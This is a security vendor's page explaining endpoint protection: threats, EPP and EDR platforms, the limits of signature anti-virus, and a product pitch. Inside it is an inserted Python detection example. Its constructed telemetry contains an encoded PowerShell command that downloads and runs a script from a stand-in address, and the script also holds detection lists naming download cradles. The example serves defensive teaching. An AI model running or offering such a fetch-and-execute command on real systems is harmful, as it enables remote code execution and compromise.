Endpoint Protection

Endpoints used to be operated safely behind a network perimeter. However, the rapid growth of remote access to corporate resources, cloud-based applications and social media from desktops, laptops, smartphones and tablets means that the endpoint is now the new perimeter. Endpoints are attacked in a variety of ways, including email-based phishing, ransomware and other malware, and drive-by downloads while web browsing.

For more information about Endpoint Protection, call our security consultants at +31 (0) 345 506 105 or send an email to info@isoc24.com

Given that endpoints often store large quantities of corporate data, and also contain virtually everything that attackers need to gain entry into corporate networks, robust endpoint protection is a critical element in any corporate security infrastructure.

Key points:

  • Threat actors have expanded the range of attack vectors used against organizations and endpoints. As threats expand, so too must the nature of security defenses to protect against and mitigate advanced and emerging threats. Anti-virus protections alone will not protect endpoints from modern threats.
  • Endpoints are attractive to threat actors for three reasons: many endpoints directly store sensitive and confidential business data that can be used for nefarious purposes, compromising an endpoint often provides access to further network resources and cloud data repositories, and newer categories of mobile endpoints have lower security defenses compared to endpoints located behind perimeter and network security defenses.
  • Ransomware, malware, phishing attempts and other types of cyber-attacks continue to grow in volume and complexity, with several hundred thousand new malicious programs or unwanted apps registered every day.
  • New categories of endpoints supporting emergent business applications are finding their way into physical organizational spaces, including the operational technology (OT) endpoints that run smart buildings. The security threats that might be targeted against these new categories of endpoints are unknown or only poorly understood at this stage.
  • Addressing the threats unleashed against endpoints requires a prudent balancing of people, process and technology investments. All three working in synergy provides the basis for effective protection, while relying on only one or two will undermine the efficacy of the overall playbook.

Threats to Endpoints

Two statements are true about endpoints: first, they are critical to getting work done by employees, and second, they are under attack by cyber criminals. With respect to employees, a growing diversity of endpoints is used for task completion, organizational communication, team collaboration and virtual meetings, including laptops, tablets, smartphones, and new smart devices such as smart speakers.

Cyber criminals, on the other hand, have diversified the attacks they launch against endpoints, many of which circumvent traditional endpoint security capabilities, in order to gain a foothold for data exfiltration, credential compromise and fraud. An initial foothold leads to further attacks, including phishing of supply-chain partners from the compromised account and lateral movement to gain control over an ever larger set of endpoints, servers and other network devices, in preparation for a final blow that cripples the organization, such as a ransomware attack.

Security threats against endpoints include traditional and emerging attack vectors, such as malware, fileless attacks, data breaches, ransomware, phishing attacks, phishing via social media, unpatched vulnerabilities, compromised software patches and updates, drive-by downloads, infected USB drives, insecure and non-compliant applications, new devices that lack strong security and new categories of endpoints that have undetermined security threats.

Dynamics of Protecting Endpoints

Understanding the current dynamics in endpoint usage and the security threats deployed against endpoints is essential in embracing appropriate security solutions. The following dynamics are at play:

  • Growing volume and complexity of threats.
  • Growing diversity in endpoints.
  • Fewer security signals from the network, as endpoint-to-cloud traffic increasingly bypasses perimeter infrastructure.
  • Growing volumes of endpoint log data that must be collected, correlated and analyzed.

Changes under way in the endpoint security space over the near and mid-term:

  • The essential notion of a corporate network is becoming redundant, as core IT services, data repositories, and applications are outsourced across multi-vendor cloud services. An increasing proportion of corporate data traffic is bypassing network security infrastructure in favor of direct connectivity between endpoints and a plethora of cloud services. Under such an architectural approach, security has to move closer to the endpoints and each of the connected services, with a consolidated reporting and analytics layer to assess threats across a diverse data estate and enable security professionals to respond appropriately.
  • Cyber attackers using ransomware are increasing the pressure on compromised targets by changing their approach. Initially the threat was “pay the ransom or lose your data forever,” but this is often ineffective at extracting a payment because many organizations refuse to pay on principle, or can restore from backups. Attackers are transitioning to a more lucrative business model, often called double extortion: “pay the ransom or we will publish your data” - and by implication, create a data breach that attracts regulatory investigation and inflicts financial damage through reputational loss.
  • Every new device type and category introduces new threat vectors, opening avenues for cyber-attacks to cause disruption and loss. For example, compromising the operational technology endpoints that power smart buildings would enable an attacker to manipulate people’s movements within a building, potentially creating life-and-death situations as the building is turned against its inhabitants. Compromising the air-conditioning and ventilation systems to weaponize air flow is a related example. Early attempts to manipulate compromised industrial control systems in ways that could cause loss of human life have already been observed, and the same threat playbooks could potentially be leveraged against office buildings.

Solutions to consider for improving Endpoint Protection

A multitude of solutions are available for improving endpoint protection. Because endpoints are a critical enabler of productivity on one hand and a growing vector of compromise on the other, having appropriate protections in place is essential.

We see the following solutions as core to improving endpoint protection.

People, Process and Technology

Improving endpoint protection requires attention to the three complementary strands of people, process and technology. The dynamic interplay between these three enables strong protections for endpoints; relying on only one or two will be ineffective.

The technology component offers a wide array of potential security protections for endpoints. It’s easy to spend money acquiring new technology options, but without corresponding capability improvements in the people and process components, little value will be created. Spending anything on security protections that are poorly used and don’t align with the business threat landscape is a waste of financial investment, human capital, and the already stretched energy of cyber security professionals.

Endpoint Protection Platforms (EPP)

EPPs offer an integrated collection of capabilities for protecting endpoints, covering solution areas that were originally brought to market as point products. The usual capabilities span anti-virus, URL filtering, enforcement of baseline endpoint configuration requirements, vulnerability assessment and remediation, visibility into and control over endpoint encryption settings, and more. Endpoint Detection and Response (EDR) capabilities are also increasingly integrated into EPP solutions.

An EPP offers capabilities to:

  • Monitor, protect and report on all connected endpoints, both on and off the network, through agent-based capture of events on the endpoint with submission to the platform for centralized oversight and analysis. Detailed logs from endpoints combined with consolidated analysis in the platform enable early identification of abnormal behavior and emerging threats.
  • Automatically resolve security incidents with minimal involvement from cyber security staff. For example, automated playbooks specify how the platform should respond to newly identified and emerging threats on a given endpoint, and how to harden security defenses across the rest. Having a security platform that will automatically deal with as much as possible enables cyber security staff to focus on the higher-level issues, critical threats, and overall strategy of ensuring endpoint protection.
  • Detect and enroll newly identified endpoints across the network estate. While written security policies set the expectations for how new endpoints are introduced, proactive automated discovery is essential: an endpoint the platform does not know about receives neither protection nor monitoring.

Organizations are increasingly moving to cloud-based EPPs, thereby eliminating the need to deploy and manage on-premises infrastructure. In addition to the much faster time-to-protection offered by cloud-based EPPs, such services draw on a far wider set of threat signals from a large global customer base, from which threat intelligence is developed and shared across all customers to thwart new threats. Organizations running an on-premises EPP in isolation will typically not have access to the same breadth of threat intelligence. The trade-off is that endpoint telemetry leaves the organization, so data residency and retention terms should be reviewed as part of vendor selection.

Endpoint Detection and Response (EDR)

EDR solutions take a different approach to security attacks and threats, by providing visibility into current attacks and threats on endpoints, along with options for remediation across the endpoint estate. EDR doesn’t primarily attempt to block attacks - a role played by solutions under the EPP banner - but rather to analyze emerging threats and supply the tools to resolve compromised endpoints and harden the rest. EDR solutions achieve this by supplying continuous real-time or near real-time visibility into what is happening across all connected endpoints, giving early warning of abnormal behaviors (unusual parent-child process relationships, obfuscated command lines, unexpected remote execution) that betray the intent of seemingly harmless or obfuscated activity. Once a new attack chain is identified, protections can be rolled out to other vulnerable endpoints to decrease the likelihood of further threats landing successfully.

Anti-Virus (AV)

Protection against known viruses and malware is important - why get compromised by something that has already been seen and mitigated? - but traditional signature-based anti-virus tools alone no longer offer effective protection. As the quantity of known viruses and malware increases, keeping all endpoints up to date with the latest signatures becomes a logistical challenge. Taken to its conclusion, signature files would need to be streamed continuously and in real time, leaving any disconnected endpoint at risk; and a signature only matches the exact sample it was written for, so a repacked or trivially modified copy slips through. Behavior-based profiling of all processes - for both known and unknown viruses and malware - offers a more strategic and lighter approach to ensure threats are mitigated, at the cost of rules that must be tuned to the organization’s normal activity to keep false positives manageable.
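The following is an added example, not code from the original page or from any vendor product, illustrating two points made above: the EPP/EDR bullet on agent-captured endpoint events enabling early identification of abnormal behavior, and the contrast between signature matching and behavior-based detection in this section. It runs a hash-based "signature" check and a handful of behavior rules over constructed process-creation events (hostnames, account names, timestamps, the sample bytes and the 198.51.100.7 address are all made up for the example), then correlates across hosts to flag the lateral movement described under "Threats to Endpoints".

```python
"""Added example: signature vs behaviour detection over constructed endpoint
process-creation events. Not part of the original page or any vendor product."""
import base64
import hashlib

# --- 1. Signature matching: exact SHA-256 of a known sample (constructed bytes, not real malware) ---
KNOWN_BAD = b"MZ\x90\x00" + b"constructed-dropper-sample-v1"
SIGNATURES = {hashlib.sha256(KNOWN_BAD).hexdigest()}

def signature_match(file_bytes: bytes) -> bool:
    """True only for byte-identical samples; any repacked or padded copy slips through."""
    return hashlib.sha256(file_bytes).hexdigest() in SIGNATURES

# --- 2. Behaviour rules over process-creation events (fields modelled on typical EDR telemetry) ---
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "psexesvc.exe"}  # typical parents of shells spawned via WMI / PsExec-style tools
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex ", "invoke-expression")

def decode_encoded_powershell(cmdline: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); return '' if none or undecodable."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand", "-ec", "-e"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""

def evaluate_event(ev: dict) -> list:
    """Return (rule, detail) pairs that fire for one process-creation event."""
    hits = []
    parent, image = ev["parent"].lower(), ev["image"].lower()
    if parent in OFFICE_APPS and image in INTERPRETERS:
        hits.append(("office-spawns-interpreter", f"{ev['parent']} -> {ev['image']}"))
    decoded = decode_encoded_powershell(ev.get("cmdline", ""))
    if decoded and any(m in decoded.lower() for m in CRADLE_MARKERS):
        hits.append(("encoded-download-cradle", decoded))
    if parent in REMOTE_EXEC_PARENTS and image in INTERPRETERS:
        hits.append(("remote-exec-shell", f"{ev['parent']} -> {ev['image']} as {ev['user']}"))
    return hits

def run_detections(events: list, window_s: int = 600) -> dict:
    """Per-event alerts plus a cross-host correlation: the same account gets a foothold on
    one host and then a remotely spawned shell on another host within window_s seconds."""
    alerts, footholds, remote_shells = [], [], []
    for ev in sorted(events, key=lambda e: e["ts"]):
        for rule, detail in evaluate_event(ev):
            alerts.append((ev["host"], ev["ts"], rule, detail))
            if rule == "office-spawns-interpreter":
                footholds.append(ev)
            elif rule == "remote-exec-shell":
                remote_shells.append(ev)
    lateral = [
        (r["user"], f["host"], r["host"])
        for r in remote_shells
        for f in footholds
        if f["user"] == r["user"] and f["host"] != r["host"] and 0 <= r["ts"] - f["ts"] <= window_s
    ]
    return {"alerts": alerts, "lateral_movement": lateral}

# Constructed sample telemetry: a macro-document phishing chain on WS-017, followed by WMI remote
# execution on FS-02 under the same account, plus a benign scheduled script on WS-022.
CRADLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(CRADLE_CMD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "WS-017", "user": "CORP\\jdoe", "parent": "explorer.exe", "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"ts": 1030, "host": "WS-017", "user": "CORP\\jdoe", "parent": "outlook.exe", "image": "winword.exe", "cmdline": "winword.exe /n invoice.docm"},
    {"ts": 1042, "host": "WS-017", "user": "CORP\\jdoe", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"ts": 1300, "host": "FS-02", "user": "CORP\\jdoe", "parent": "wmiprvse.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": 1500, "host": "WS-022", "user": "CORP\\asmith", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe -File backup.ps1"},
]

if __name__ == "__main__":
    print("signature hit on known sample:", signature_match(KNOWN_BAD))
    print("signature hit on padded copy: ", signature_match(KNOWN_BAD + b"\x00"))
    result = run_detections(SAMPLE_EVENTS)
    for host, ts, rule, detail in result["alerts"]:
        print(f"[{host} t={ts}] {rule}: {detail}")
    print("lateral movement:", result["lateral_movement"])
```

The padded copy of the "known" sample defeats the hash signature while the behavior rules still fire on what the process actually does; the cross-host correlation is the kind of consolidated analysis the platform performs that no single endpoint can do on its own. The parent-process and marker lists are assumptions for the example and would need tuning against an organization's real baseline.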

For organizations using Windows 10, one potential short-term approach to the anti-virus quandary is to rely on the anti-virus and anti-malware protection built into Windows 10 (Microsoft Defender Antivirus) rather than buying a separate product. The budget that would have been spent on best-of-breed anti-virus tools can then be invested in protections against the newer, advanced and emerging threats that anti-virus and anti-malware are ineffective against.

Finally, while not a protection deployed on the endpoint itself, cloud-based sanitization of inbound and outbound email streams (virus and malware scanning before messages reach the mailbox) is a very useful wider protection as part of an overall security strategy, since email-based phishing is one of the main routes by which malware reaches endpoints.

Endpoint protection must be a key component in an overall security strategy, but can only be one strand complemented with cloud security, network security, and physical security, among others. An overall security strategy should be created and defined in light of an enterprise-wide risk assessment for the organization.

iSOC24 carries the VMware CarbonBlack Endpoint Protection Platform in its portfolio. If you would like to learn more, please contact one of our specialists to hear about the advantages of VMware CarbonBlack Endpoint Protection technology within your organization.